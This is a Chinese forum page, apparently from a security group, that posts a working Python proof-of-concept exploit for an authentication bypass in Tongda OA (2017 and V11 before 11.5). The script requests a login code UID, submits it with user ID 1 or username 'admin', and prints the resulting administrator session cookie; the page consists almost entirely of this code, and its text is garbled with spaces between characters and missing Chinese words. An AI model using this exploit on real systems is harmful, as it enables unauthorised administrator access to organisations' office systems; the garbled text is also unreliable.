搜索

[28534] 2020-08-27_通达OA任意用户登录突破

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2020-08-27_通达OA任意用户登录突破 O A O t s   2 0 2 0 - 0 8 - 2 7 T o n g D a O A - F a k e - U s e r O A   使 使 1 .   p y t h o n 3   p o c . p y   - v     - u r l   u r l 2 .   S E S S I O N I D 3 .   C o o k i e S E S S I O N I D a d m i n O A 2 0 1 7 V 1 1 . X < V 1 1 . 5 ' ' ' @ A u t h o r                   :   S p 4 c e @ D a t e                       :   2 0 2 0 - 0 3 - 1 7   2 3 : 4 2 : 1 6 L a s t E d i t o r s         :   S p 4 c e L a s t E d i t T i m e       :   2 0 2 0 - 0 8 - 2 7   1 0 : 2 1 : 4 4 @ D e s c r i p t i o n         :   C h a l l e n g e   E v e r y t h i n g . ' ' ' i m p o r t   r e q u e s t s f r o m   r a n d o m   i m p o r t   c h o i c e i m p o r t   a r g p a r s e i m p o r t   j s o n U S E R _ A G E N T S   =   [         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   6 . 0 ;   W i n d o w s   N T   5 . 1 ;   S V 1 ;   A c o o B r o w s e r ;   . N E T   C L R   1 . 1 . 4 3 2 2 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ) " ,         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 0 ;   A c o o   B r o w s e r ;   S L C C 1 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ;   M e d i a   C e n t e r   P C   5 . 0 ;   . N E T   C L R   3 . 0 . 0 4 5 0 6 ) " ,         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   A O L   9 . 5 ;   A O L B u i l d   4 3 3 7 . 3 5 ;   W i n d o w s   N T   5 . 1 ;   . N E T   C L R   1 . 1 . 4 3 2 2 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ) " ,         " M o z i l l a / 5 . 0   ( W i n d o w s ;   U ;   M S I E   9 . 0 ;   W i n d o w s   N T   9 . 0 ;   e n - U S ) " ,         " M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   9 . 0 ;   W i n d o w s   N T   6 . 1 ;   W i n 6 4 ;   x 6 4 ;   T r i d e n t / 5 . 0 ;   . N E T   C L R   3 . 5 . 3 0 7 2 9 ;   . N E T   C L R   3 . 0 . 3 0 7 2 9 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ;   M e d i a   C e n t e r   P C   6 . 0 ) " ,         " M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   8 . 0 ;   W i n d o w s   N T   6 . 0 ;   T r i d e n t / 4 . 0 ;   W O W 6 4 ;   T r i d e n t / 4 . 0 ;   S L C C 2 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ;   . N E T   C L R   3 . 5 . 3 0 7 2 9 ;   . N E T   C L R   3 . 0 . 3 0 7 2 9 ;   . N E T   C L R   1 . 0 . 3 7 0 5 ;   . N E T   C L R   1 . 1 . 4 3 2 2 ) "         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 b ;   W i n d o w s   N T   5 . 2 ;   . N E T   C L R   1 . 1 . 4 3 2 2 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ;   I n f o P a t h . 2 ;   . N E T   C L R   3 . 0 . 0 4 5 0 6 . 3 0 ) " ,         " M o z i l l a / 5 . 0   ( W i n d o w s ;   U ;   W i n d o w s   N T   5 . 1 ;   z h - C N )   A p p l e W e b K i t / 5 2 3 . 1 5   ( K H T M L ,   l i k e   G e c k o ,   S a f a r i / 4 1 9 . 3 )   A r o r a / 0 . 3   ( C h a n g e :   2 8 7   c 9 d f b 3 0 ) " ,         " M o z i l l a / 5 . 0   ( X 1 1 ;   U ;   L i n u x ;   e n - U S )   A p p l e W e b K i t / 5 2 7 +   ( K H T M L ,   l i k e   G e c k o ,   S a f a r i / 4 1 9 . 3 )   A r o r a / 0 . 6 " ,         " M o z i l l a / 5 . 0   ( W i n d o w s ;   U ;   W i n d o w s   N T   5 . 1 ;   e n - U S ;   r v : 1 . 8 . 1 . 2 p r e )   G e c k o / 2 0 0 7 0 2 1 5   K - N i n j a / 2 . 1 . 1 " ,         " M o z i l l a / 5 . 0   ( W i n d o w s ;   U ;   W i n d o w s   N T   5 . 1 ;   z h - C N ;   r v : 1 . 9 )   G e c k o / 2 0 0 8 0 7 0 5   F i r e f o x / 3 . 0   K a p i k o / 3 . 0 " ,         " M o z i l l a / 5 . 0   ( X 1 1 ;   L i n u x   i 6 8 6 ;   U ; )   G e c k o / 2 0 0 7 0 3 2 2   K a z e h a k a s e / 0 . 4 . 5 " ,         " M o z i l l a / 5 . 0   ( X 1 1 ;   U ;   L i n u x   i 6 8 6 ;   e n - U S ;   r v : 1 . 9 . 0 . 8 )   G e c k o   F e d o r a / 1 . 9 . 0 . 8 - 1 . f c 1 0   K a z e h a k a s e / 0 . 5 . 6 " ,         " M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 5 . 1 1   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 1 7 . 0 . 9 6 3 . 5 6   S a f a r i / 5 3 5 . 1 1 " ,         " M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 7 _ 3 )   A p p l e W e b K i t / 5 3 5 . 2 0   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 1 9 . 0 . 1 0 3 6 . 7   S a f a r i / 5 3 5 . 2 0 " ,         " O p e r a / 9 . 8 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 6 . 8 ;   U ;   f r )   P r e s t o / 2 . 9 . 1 6 8   V e r s i o n / 1 1 . 5 2 " ,         " M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 6 . 1 1   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 2 0 . 0 . 1 1 3 2 . 1 1   T a o B r o w s e r / 2 . 0   S a f a r i / 5 3 6 . 1 1 " ,         " M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 1   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 2 1 . 0 . 1 1 8 0 . 7 1   S a f a r i / 5 3 7 . 1   L B B R O W S E R " ,         " M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   9 . 0 ;   W i n d o w s   N T   6 . 1 ;   W O W 6 4 ;   T r i d e n t / 5 . 0 ;   S L C C 2 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ;   . N E T   C L R   3 . 5 . 3 0 7 2 9 ;   . N E T   C L R   3 . 0 . 3 0 7 2 9 ;   M e d i a   C e n t e r   P C   6 . 0 ;   . N E T 4 . 0 C ;   . N E T 4 . 0 E ;   L B B R O W S E R ) "         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   6 . 0 ;   W i n d o w s   N T   5 . 1 ;   S V 1 ;   Q Q D o w n l o a d   7 3 2 ;   . N E T 4 . 0 C ;   . N E T 4 . 0 E ;   L B B R O W S E R ) " ,         " M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 5 . 1 1   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 1 7 . 0 . 9 6 3 . 8 4   S a f a r i / 5 3 5 . 1 1   L B B R O W S E R " ,         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 1 ;   W O W 6 4 ;   T r i d e n t / 5 . 0 ;   S L C C 2 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ;   . N E T   C L R   3 . 5 . 3 0 7 2 9 ;   . N E T   C L R   3 . 0 . 3 0 7 2 9 ;   M e d i a   C e n t e r   P C   6 . 0 ;   . N E T 4 . 0 C ;   . N E T 4 . 0 E ) "         " M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   9 . 0 ;   W i n d o w s   N T   6 . 1 ;   W O W 6 4 ;   T r i d e n t / 5 . 0 ;   S L C C 2 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ;   . N E T   C L R   3 . 5 . 3 0 7 2 9 ;   . N E T   C L R   3 . 0 . 3 0 7 2 9 ;   M e d i a   C e n t e r   P C   6 . 0 ;   . N E T 4 . 0 C ;   . N E T 4 . 0 E ;   Q Q B r o w s e r / 7 . 0 . 3 6 9 8 . 4 0 0 ) "         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   6 . 0 ;   W i n d o w s   N T   5 . 1 ;   S V 1 ;   Q Q D o w n l o a d   7 3 2 ;   . N E T 4 . 0 C ;   . N E T 4 . 0 E ) " ,         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   5 . 1 ;   T r i d e n t / 4 . 0 ;   S V 1 ;   Q Q D o w n l o a d   7 3 2 ;   . N E T 4 . 0 C ;   . N E T 4 . 0 E ;   3 6 0 S E ) " ,         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   6 . 0 ;   W i n d o w s   N T   5 . 1 ;   S V 1 ;   Q Q D o w n l o a d   7 3 2 ;   . N E T 4 . 0 C ;   . N E T 4 . 0 E ) " ,         " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 1 ;   W O W 6 4 ;   T r i d e n t / 5 . 0 ;   S L C C 2 ;   . N E T   C L R   2 . 0 . 5 0 7 2 7 ;   . N E T   C L R   3 . 5 . 3 0 7 2 9 ;   . N E T   C L R   3 . 0 . 3 0 7 2 9 ;   M e d i a   C e n t e r   P C   6 . 0 ;   . N E T 4 . 0 C ;   . N E T 4 . 0 E ) "         " M o z i l l a / 5 . 0   ( W i n d o w s   N T   5 . 1 )   A p p l e W e b K i t / 5 3 7 . 1   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 2 1 . 0 . 1 1 8 0 . 8 9   S a f a r i / 5 3 7 . 1 " ,         " M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 1   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 2 1 . 0 . 1 1 8 0 . 8 9   S a f a r i / 5 3 7 . 1 " ,         " M o z i l l a / 5 . 0   ( i P a d ;   U ;   C P U   O S   4 _ 2 _ 1   l i k e   M a c   O S   X ;   z h - c n )   A p p l e W e b K i t / 5 3 3 . 1 7 . 9   ( K H T M L ,   l i k e   G e c k o )   V e r s i o n / 5 . 0 . 2   M o b i l e / 8 C 1 4 8   S a f a r i / 6 5 3 3 . 1 8 . 5 " ,         " M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W i n 6 4 ;   x 6 4 ;   r v : 2 . 0 b 1 3 p r e )   G e c k o / 2 0 1 1 0 3 0 7   F i r e f o x / 4 . 0 b 1 3 p r e " ,         " M o z i l l a / 5 . 0   ( X 1 1 ;   U b u n t u ;   L i n u x   x 8 6 _ 6 4 ;   r v : 1 6 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 1 6 . 0 " ,         " M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 1 1   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 2 3 . 0 . 1 2 7 1 . 6 4   S a f a r i / 5 3 7 . 1 1 " ,         " M o z i l l a / 5 . 0   ( X 1 1 ;   U ;   L i n u x   x 8 6 _ 6 4 ;   z h - C N ;   r v : 1 . 9 . 2 . 1 0 )   G e c k o / 2 0 1 0 0 9 2 2   U b u n t u / 1 0 . 1 0   ( m a v e r i c k )   F i r e f o x / 3 . 6 . 1 0 " ] h e a d e r s = { } d e f   g e t V 1 1 S e s s i o n ( u r l ) :         c h e c k U r l   =   u r l + ' / g e n e r a l / l o g i n _ c o d e . p h p '         t r y :                 h e a d e r s [ " U s e r - A g e n t " ]   =   c h o i c e ( U S E R _ A G E N T S )                 r e s   =   r e q u e s t s . g e t ( c h e c k U r l , h e a d e r s = h e a d e r s )
                r e s   =   r e q u e s t s . g e t ( c h e c k U r l , h e a d e r s = h e a d e r s )                 r e s T e x t   =   s t r ( r e s . t e x t ) . s p l i t ( ' { ' )                 c o d e U i d   =   r e s T e x t [ - 1 ] . r e p l a c e ( ' } " } ' ,   ' ' ) . r e p l a c e ( ' r n ' ,   ' ' )                 g e t S e s s U r l   =   u r l + ' / l o g i n c h e c k _ c o d e . p h p '                 r e s   =   r e q u e s t s . p o s t (                         g e t S e s s U r l ,   d a t a = { ' C O D E U I D ' :   ' { ' + c o d e U i d + ' } ' ,   ' U I D ' :   i n t ( 1 ) } , h e a d e r s = h e a d e r s )                 t m p _ c o o k i e   =   r e s . h e a d e r s [ ' S e t - C o o k i e ' ]                 h e a d e r s [ " U s e r - A g e n t " ]   =   c h o i c e ( U S E R _ A G E N T S )                 h e a d e r s [ " C o o k i e " ]   =   t m p _ c o o k i e                 c h e c k _ a v a i l a b l e   =   r e q u e s t s . g e t ( u r l   +   ' / g e n e r a l / i n d e x . p h p ' , h e a d e r s = h e a d e r s )                 i f   ' '   n o t   i n   c h e c k _ a v a i l a b l e . t e x t :                         i f   ' '   n o t   i n   c h e c k _ a v a i l a b l e . t e x t :                                 p r i n t ( ' [ + ] G e t   A v a i l a b l e   C O O K I E : '   +   r e s . h e a d e r s [ ' S e t - C o o k i e ' ] )                 e l s e :                         p r i n t ( ' [ - ] S o m e t h i n g   W r o n g   W i t h   '   +   u r l   +   ' , M a y b e   N o t   V u l n e r a b l e . ' )         e x c e p t :                 p r i n t ( ' [ - ] S o m e t h i n g   W r o n g   W i t h   ' + u r l ) d e f   g e t 2 0 1 7 S e s s i o n ( u r l ) :         c h e c k U r l   =   u r l + ' / i s p i r i t / l o g i n _ c o d e . p h p '         t r y :                 h e a d e r s [ " U s e r - A g e n t " ]   =   c h o i c e ( U S E R _ A G E N T S )                 r e s   =   r e q u e s t s . g e t ( c h e c k U r l , h e a d e r s = h e a d e r s )                 r e s T e x t   =   j s o n . l o a d s ( r e s . t e x t )                 c o d e U i d   =   r e s T e x t [ ' c o d e u i d ' ]                 c o d e S c a n U r l   =   u r l + ' / g e n e r a l / l o g i n _ c o d e _ s c a n . p h p '                 r e s   =   r e q u e s t s . p o s t ( c o d e S c a n U r l ,   d a t a = { ' c o d e u i d ' :   c o d e U i d ,   ' u i d ' :   i n t (                         1 ) ,   ' s o u r c e ' :   ' p c ' ,   ' t y p e ' :   ' c o n f i r m ' ,   ' u s e r n a m e ' :   ' a d m i n ' } , h e a d e r s = h e a d e r s )                 r e s T e x t   =   j s o n . l o a d s ( r e s . t e x t )                 s t a t u s   =   r e s T e x t [ ' s t a t u s ' ]                 i f   s t a t u s   = =   s t r ( 1 ) :                         g e t C o d e U i d U r l   =   u r l + ' / i s p i r i t / l o g i n _ c o d e _ c h e c k . p h p ? c o d e u i d = ' + c o d e U i d                         r e s   =   r e q u e s t s . g e t ( g e t C o d e U i d U r l )                         t m p _ c o o k i e   =   r e s . h e a d e r s [ ' S e t - C o o k i e ' ]                         h e a d e r s [ " U s e r - A g e n t " ]   =   c h o i c e ( U S E R _ A G E N T S )                         h e a d e r s [ " C o o k i e " ]   =   t m p _ c o o k i e                         c h e c k _ a v a i l a b l e   =   r e q u e s t s . g e t ( u r l   +   ' / g e n e r a l / i n d e x . p h p ' , h e a d e r s = h e a d e r s )                         i f   ' '   n o t   i n   c h e c k _ a v a i l a b l e . t e x t :                                 i f   ' '   n o t   i n   c h e c k _ a v a i l a b l e . t e x t :                                         p r i n t ( ' [ + ] G e t   A v a i l a b l e   C O O K I E : '   +   r e s . h e a d e r s [ ' S e t - C o o k i e ' ] )                         e l s e :                                 p r i n t ( ' [ - ] S o m e t h i n g   W r o n g   W i t h   '   +   u r l   +   ' , M a y b e   N o t   V u l n e r a b l e . ' )                 e l s e :                         p r i n t ( ' [ - ] S o m e t h i n g   W r o n g   W i t h   ' + u r l     +   '   M a y b e   N o t   V u l n e r a b l e   ? ' )         e x c e p t :                 p r i n t ( ' [ - ] S o m e t h i n g   W r o n g   W i t h   ' + u r l ) i f   _ _ n a m e _ _   = =   " _ _ m a i n _ _ " :         p a r s e r   =   a r g p a r s e . A r g u m e n t P a r s e r ( )         p a r s e r . a d d _ a r g u m e n t (                 " - v " ,                 " - - t d o a v e r s i o n " ,                 t y p e = i n t ,                 c h o i c e s = [ 1 1 ,   2 0 1 7 ] ,                 h e l p = " T a r g e t   T o n g D a   O A   V e r s i o n .   e . g :   - v   1 1 - v   2 0 1 7 " )         p a r s e r . a d d _ a r g u m e n t (                 " - u r l " ,                 " - - t a r g e t u r l " ,                 t y p e = s t r ,                 h e l p = " T a r g e t   U R L .   e . g :   - u r l   1 9 2 . 1 6 8 . 2 . 1 - u r l   h t t p : / / 1 9 2 . 1 6 8 . 2 . 1 "         )         a r g s   =   p a r s e r . p a r s e _ a r g s ( )         u r l   =   a r g s . t a r g e t u r l         i f   ' h t t p : / / '   n o t   i n   u r l :                 u r l   =   ' h t t p : / / '   +   u r l         i f   a r g s . t d o a v e r s i o n   = =   1 1 :                 g e t V 1 1 S e s s i o n ( u r l )         e l i f   a r g s . t d o a v e r s i o n   = =   2 0 1 7 :                 g e t 2 0 1 7 S e s s i o n ( u r l )         e l s e :                 p a r s e r . p r i n t _ h e l p ( )

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理